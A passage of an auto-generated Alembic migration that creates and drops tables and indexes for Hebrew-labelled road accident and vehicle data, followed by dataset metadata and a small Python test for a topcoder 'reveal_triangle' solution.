sa.Column('didnt_cross_hebrew', sa.Text(), nullable=True),
sa.Column('cross_mode', sa.Integer(), nullable=True),
sa.Column('cross_mode_hebrew', sa.Text(), nullable=True),
sa.Column('cross_location', sa.Integer(), nullable=True),
sa.Column('cross_location_hebrew', sa.Text(), nullable=True),
sa.Column('cross_direction', sa.Integer(), nullable=True),
sa.Column('cross_direction_hebrew', sa.Text(), nullable=True),
sa.Column('road1', sa.Integer(), nullable=True),
sa.Column('road2', sa.Integer(), nullable=True),
sa.Column('km', sa.Float(), nullable=True),
sa.Column('km_raw', sa.Text(), nullable=True),
sa.Column('km_accurate', sa.Boolean(), nullable=True),
sa.Column('road_segment_id', sa.Integer(), nullable=True),
sa.Column('road_segment_number', sa.Integer(), nullable=True),
sa.Column('road_segment_name', sa.Text(), nullable=True),
sa.Column('road_segment_from_km', sa.Float(), nullable=True),
sa.Column('road_segment_to_km', sa.Float(), nullable=True),
sa.Column('road_segment_length_km', sa.Float(), nullable=True),
sa.Column('yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('yishuv_name', sa.Text(), nullable=True),
sa.Column('geo_area', sa.Integer(), nullable=True),
sa.Column('geo_area_hebrew', sa.Text(), nullable=True),
sa.Column('day_night', sa.Integer(), nullable=True),
sa.Column('day_night_hebrew', sa.Text(), nullable=True),
sa.Column('day_in_week', sa.Integer(), nullable=True),
sa.Column('day_in_week_hebrew', sa.Text(), nullable=True),
sa.Column('traffic_light', sa.Integer(), nullable=True),
sa.Column('traffic_light_hebrew', sa.Text(), nullable=True),
sa.Column('region', sa.Integer(), nullable=True),
sa.Column('region_hebrew', sa.Text(), nullable=True),
sa.Column('district', sa.Integer(), nullable=True),
sa.Column('district_hebrew', sa.Text(), nullable=True),
sa.Column('natural_area', sa.Integer(), nullable=True),
sa.Column('natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('municipal_status', sa.Integer(), nullable=True),
sa.Column('municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('yishuv_shape', sa.Integer(), nullable=True),
sa.Column('yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('street1', sa.Integer(), nullable=True),
sa.Column('street1_hebrew', sa.Text(), nullable=True),
sa.Column('street2', sa.Integer(), nullable=True),
sa.Column('street2_hebrew', sa.Text(), nullable=True),
sa.Column('house_number', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection_by_junction_number', sa.Text(), nullable=True),
sa.Column('urban_intersection', sa.Integer(), nullable=True),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.Column('accident_day', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw_hebrew', sa.Text(), nullable=True),
sa.Column('accident_hour', sa.Integer(), nullable=True),
sa.Column('accident_minute', sa.Integer(), nullable=True),
sa.Column('geom', geoalchemy2.types.Geometry(geometry_type='POINT', from_text='ST_GeomFromEWKT', name='geometry'), nullable=True),
sa.Column('longitude', sa.Float(), nullable=True),
sa.Column('latitude', sa.Float(), nullable=True),
sa.Column('x', sa.Float(), nullable=True),
sa.Column('y', sa.Float(), nullable=True),
sa.PrimaryKeyConstraint('id', 'provider_code', 'accident_year')
)
op.create_index(op.f('ix_markers_hebrew_accident_severity'), 'markers_hebrew', ['accident_severity'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_severity_hebrew'), 'markers_hebrew', ['accident_severity_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_timestamp'), 'markers_hebrew', ['accident_timestamp'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_type'), 'markers_hebrew', ['accident_type'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_type_hebrew'), 'markers_hebrew', ['accident_type_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_year'), 'markers_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_markers_hebrew_geom'), 'markers_hebrew', ['geom'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road1'), 'markers_hebrew', ['road1'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road2'), 'markers_hebrew', ['road2'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road_segment_id'), 'markers_hebrew', ['road_segment_id'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road_segment_name'), 'markers_hebrew', ['road_segment_name'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road_segment_number'), 'markers_hebrew', ['road_segment_number'], unique=False)
op.create_index(op.f('ix_markers_hebrew_street1_hebrew'), 'markers_hebrew', ['street1_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_street2_hebrew'), 'markers_hebrew', ['street2_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_yishuv_name'), 'markers_hebrew', ['yishuv_name'], unique=False)
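# vehicles_hebrew: vehicle-level records, keyed by (id, accident_id, provider_code, accident_year).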
op.create_table('vehicles_hebrew',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.Column('engine_volume', sa.Integer(), nullable=True),
sa.Column('engine_volume_hebrew', sa.Text(), nullable=True),
sa.Column('manufacturing_year', sa.Integer(), nullable=True),
sa.Column('driving_directions', sa.Integer(), nullable=True),
sa.Column('driving_directions_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_status', sa.Integer(), nullable=True),
sa.Column('vehicle_status_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_attribution', sa.Integer(), nullable=True),
sa.Column('vehicle_attribution_hebrew', sa.Text(), nullable=True),
sa.Column('seats', sa.Integer(), nullable=True),
sa.Column('total_weight', sa.Integer(), nullable=True),
sa.Column('total_weight_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_damage', sa.Integer(), nullable=True),
sa.Column('vehicle_damage_hebrew', sa.Text(), nullable=True),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id', 'accident_id', 'provider_code', 'accident_year')
)
op.create_index(op.f('ix_vehicles_hebrew_accident_year'), 'vehicles_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_vehicles_hebrew_vehicle_type'), 'vehicles_hebrew', ['vehicle_type'], unique=False)
op.create_index(op.f('ix_vehicles_hebrew_vehicle_type_hebrew'), 'vehicles_hebrew', ['vehicle_type_hebrew'], unique=False)
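# vehicles_markers_hebrew: vehicle records denormalized with their accident (marker) attributes.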
op.create_table('vehicles_markers_hebrew',
sa.Column('accident_timestamp', sa.DateTime(), nullable=True),
sa.Column('accident_type', sa.Integer(), nullable=True),
sa.Column('accident_type_hebrew', sa.Text(), nullable=True),
sa.Column('accident_severity', sa.Integer(), nullable=True),
sa.Column('accident_severity_hebrew', sa.Text(), nullable=True),
sa.Column('location_accuracy', sa.Integer(), nullable=True),
sa.Column('location_accuracy_hebrew', sa.Text(), nullable=True),
sa.Column('road_type', sa.Integer(), nullable=True),
sa.Column('road_type_hebrew', sa.Text(), nullable=True),
sa.Column('road_shape', sa.Integer(), nullable=True),
sa.Column('road_shape_hebrew', sa.Text(), nullable=True),
sa.Column('day_type', sa.Integer(), nullable=True),
sa.Column('day_type_hebrew', sa.Text(), nullable=True),
sa.Column('police_unit', sa.Integer(), nullable=True),
sa.Column('police_unit_hebrew', sa.Text(), nullable=True),
sa.Column('one_lane', sa.Integer(), nullable=True),
sa.Column('one_lane_hebrew', sa.Text(), nullable=True),
sa.Column('multi_lane', sa.Integer(), nullable=True),
sa.Column('multi_lane_hebrew', sa.Text(), nullable=True),
sa.Column('speed_limit', sa.Integer(), nullable=True),
sa.Column('speed_limit_hebrew', sa.Text(), nullable=True),
sa.Column('road_intactness', sa.Integer(), nullable=True),
sa.Column('road_intactness_hebrew', sa.Text(), nullable=True),
sa.Column('road_width', sa.Integer(), nullable=True),
sa.Column('road_width_hebrew', sa.Text(), nullable=True),
sa.Column('road_sign', sa.Integer(), nullable=True),
sa.Column('road_sign_hebrew', sa.Text(), nullable=True),
sa.Column('road_light', sa.Integer(), nullable=True),
sa.Column('road_light_hebrew', sa.Text(), nullable=True),
sa.Column('road_control', sa.Integer(), nullable=True),
sa.Column('road_control_hebrew', sa.Text(), nullable=True),
sa.Column('weather', sa.Integer(), nullable=True),
sa.Column('weather_hebrew', sa.Text(), nullable=True),
sa.Column('road_surface', sa.Integer(), nullable=True),
sa.Column('road_surface_hebrew', sa.Text(), nullable=True),
sa.Column('road_object', sa.Integer(), nullable=True),
sa.Column('road_object_hebrew', sa.Text(), nullable=True),
sa.Column('object_distance', sa.Integer(), nullable=True),
sa.Column('object_distance_hebrew', sa.Text(), nullable=True),
sa.Column('didnt_cross', sa.Integer(), nullable=True),
sa.Column('didnt_cross_hebrew', sa.Text(), nullable=True),
sa.Column('cross_mode', sa.Integer(), nullable=True),
sa.Column('cross_mode_hebrew', sa.Text(), nullable=True),
sa.Column('cross_location', sa.Integer(), nullable=True),
sa.Column('cross_location_hebrew', sa.Text(), nullable=True),
sa.Column('cross_direction', sa.Integer(), nullable=True),
sa.Column('cross_direction_hebrew', sa.Text(), nullable=True),
sa.Column('road1', sa.Integer(), nullable=True),
sa.Column('road2', sa.Integer(), nullable=True),
sa.Column('km', sa.Float(), nullable=True),
sa.Column('km_raw', sa.Text(), nullable=True),
sa.Column('km_accurate', sa.Boolean(), nullable=True),
sa.Column('road_segment_id', sa.Integer(), nullable=True),
sa.Column('road_segment_number', sa.Integer(), nullable=True),
sa.Column('road_segment_name', sa.Text(), nullable=True),
sa.Column('road_segment_from_km', sa.Float(), nullable=True),
sa.Column('road_segment_to_km', sa.Float(), nullable=True),
sa.Column('road_segment_length_km', sa.Float(), nullable=True),
sa.Column('accident_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_name', sa.Text(), nullable=True),
sa.Column('geo_area', sa.Integer(), nullable=True),
sa.Column('geo_area_hebrew', sa.Text(), nullable=True),
sa.Column('day_night', sa.Integer(), nullable=True),
sa.Column('day_night_hebrew', sa.Text(), nullable=True),
sa.Column('day_in_week', sa.Integer(), nullable=True),
sa.Column('day_in_week_hebrew', sa.Text(), nullable=True),
sa.Column('traffic_light', sa.Integer(), nullable=True),
sa.Column('traffic_light_hebrew', sa.Text(), nullable=True),
sa.Column('accident_region', sa.Integer(), nullable=True),
sa.Column('accident_region_hebrew', sa.Text(), nullable=True),
sa.Column('accident_district', sa.Integer(), nullable=True),
sa.Column('accident_district_hebrew', sa.Text(), nullable=True),
sa.Column('accident_natural_area', sa.Integer(), nullable=True),
sa.Column('accident_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('accident_municipal_status', sa.Integer(), nullable=True),
sa.Column('accident_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('accident_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('street1', sa.Integer(), nullable=True),
sa.Column('street1_hebrew', sa.Text(), nullable=True),
sa.Column('street2', sa.Integer(), nullable=True),
sa.Column('street2_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection_by_junction_number', sa.Text(), nullable=True),
sa.Column('accident_day', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw_hebrew', sa.Text(), nullable=True),
sa.Column('accident_hour', sa.Integer(), nullable=True),
sa.Column('accident_minute', sa.Integer(), nullable=True),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.Column('geom', geoalchemy2.types.Geometry(geometry_type='POINT', from_text='ST_GeomFromEWKT', name='geometry'), nullable=True),
sa.Column('longitude', sa.Float(), nullable=True),
sa.Column('latitude', sa.Float(), nullable=True),
sa.Column('x', sa.Float(), nullable=True),
sa.Column('y', sa.Float(), nullable=True),
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('engine_volume', sa.Integer(), nullable=True),
sa.Column('engine_volume_hebrew', sa.Text(), nullable=True),
sa.Column('manufacturing_year', sa.Integer(), nullable=True),
sa.Column('driving_directions', sa.Integer(), nullable=True),
sa.Column('driving_directions_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_status', sa.Integer(), nullable=True),
sa.Column('vehicle_status_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_attribution', sa.Integer(), nullable=True),
sa.Column('vehicle_attribution_hebrew', sa.Text(), nullable=True),
sa.Column('seats', sa.Integer(), nullable=True),
sa.Column('total_weight', sa.Integer(), nullable=True),
sa.Column('total_weight_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_damage', sa.Integer(), nullable=True),
sa.Column('vehicle_damage_hebrew', sa.Text(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('accident_year', 'id', 'accident_id', 'provider_code')
)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_severity'), 'vehicles_markers_hebrew', ['accident_severity'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_severity_hebrew'), 'vehicles_markers_hebrew', ['accident_severity_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_type'), 'vehicles_markers_hebrew', ['accident_type'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_type_hebrew'), 'vehicles_markers_hebrew', ['accident_type_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_year'), 'vehicles_markers_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_yishuv_name'), 'vehicles_markers_hebrew', ['accident_yishuv_name'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_geom'), 'vehicles_markers_hebrew', ['geom'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road1'), 'vehicles_markers_hebrew', ['road1'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road2'), 'vehicles_markers_hebrew', ['road2'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road_segment_id'), 'vehicles_markers_hebrew', ['road_segment_id'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road_segment_name'), 'vehicles_markers_hebrew', ['road_segment_name'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road_segment_number'), 'vehicles_markers_hebrew', ['road_segment_number'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_street1_hebrew'), 'vehicles_markers_hebrew', ['street1_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_street2_hebrew'), 'vehicles_markers_hebrew', ['street2_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_vehicle_type'), 'vehicles_markers_hebrew', ['vehicle_type'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_vehicle_type_hebrew'), 'vehicles_markers_hebrew', ['vehicle_type_hebrew'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
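# Mirror image of upgrade(): drop each table's indexes first, then the table itself.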
op.drop_index(op.f('ix_vehicles_markers_hebrew_vehicle_type_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_vehicle_type'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_street2_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_street1_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road_segment_number'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road_segment_name'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road_segment_id'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road2'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road1'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_geom'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_yishuv_name'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_year'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_type_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_type'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_severity_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_severity'), table_name='vehicles_markers_hebrew')
op.drop_table('vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_hebrew_vehicle_type_hebrew'), table_name='vehicles_hebrew')
op.drop_index(op.f('ix_vehicles_hebrew_vehicle_type'), table_name='vehicles_hebrew')
op.drop_index(op.f('ix_vehicles_hebrew_accident_year'), table_name='vehicles_hebrew')
op.drop_table('vehicles_hebrew')
op.drop_index(op.f('ix_markers_hebrew_yishuv_name'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_street2_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_street1_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road_segment_number'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road_segment_name'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road_segment_id'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road2'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road1'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_geom'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_year'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_type_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_type'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_timestamp'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_severity_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_severity'), table_name='markers_hebrew')
op.drop_table('markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_street2_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_street1_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_type_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_type'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_segment_number'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_segment_name'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_segment_id'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road2'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road1'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involved_type_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involved_type'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_geom'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_yishuv_name'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_year'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_timestamp'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_severity_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_severity'), table_name='involved_markers_hebrew')
op.drop_table('involved_markers_hebrew')
op.drop_index(op.f('ix_involved_hebrew_vehicle_type_hebrew'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_vehicle_type'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_involved_type_hebrew'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_involved_type'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_accident_year'), table_name='involved_hebrew')
op.drop_table('involved_hebrew')
# ### end Alembic commands ###
| 69.375594 | 157 | 0.73136 | 6,061 | 43,776 | 4.993895 | 0.029863 | 0.120788 | 0.203053 | 0.286772 | 0.983084 | 0.974296 | 0.962865 | 0.953251 | 0.920213 | 0.889421 | 0 | 0.002938 | 0.097976 | 43,776 | 630 | 158 | 69.485714 | 0.763593 | 0.007127 | 0 | 0.690789 | 0 | 0 | 0.355171 | 0.197366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003289 | false | 0 | 0.006579 | 0 | 0.009868 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5e1f6ce0a9337d65cbe42ed7ca5ab5237ddf50b6 | 170 | py | Python | test/test_reveal_triangle.py | erichaase/topcoder-python | de285d8092a94f2ec1b5c0c33eba55b5c27a5390 | ["MIT"] | 1 | 2017-03-25T17:40:57.000Z | 2017-03-25T17:40:57.000Z | test/test_reveal_triangle.py | erichaase/topcoder-python | de285d8092a94f2ec1b5c0c33eba55b5c27a5390 | ["MIT"] | null | null | null | test/test_reveal_triangle.py | erichaase/topcoder-python | de285d8092a94f2ec1b5c0c33eba55b5c27a5390 | ["MIT"] | null | null | null | from test.assert_json import assert_json
from topcoder.reveal_triangle import solution
def test_reveal_triangle():
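# assert_json presumably replays the stored 'reveal_triangle' JSON test cases against solution().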
assert_json('reveal_triangle', solution)
| 28.333333 | 48 | 0.788235 | 22 | 170 | 5.772727 | 0.454545 | 0.23622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152941 | 170 | 5 | 49 | 34 | 0.881944 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |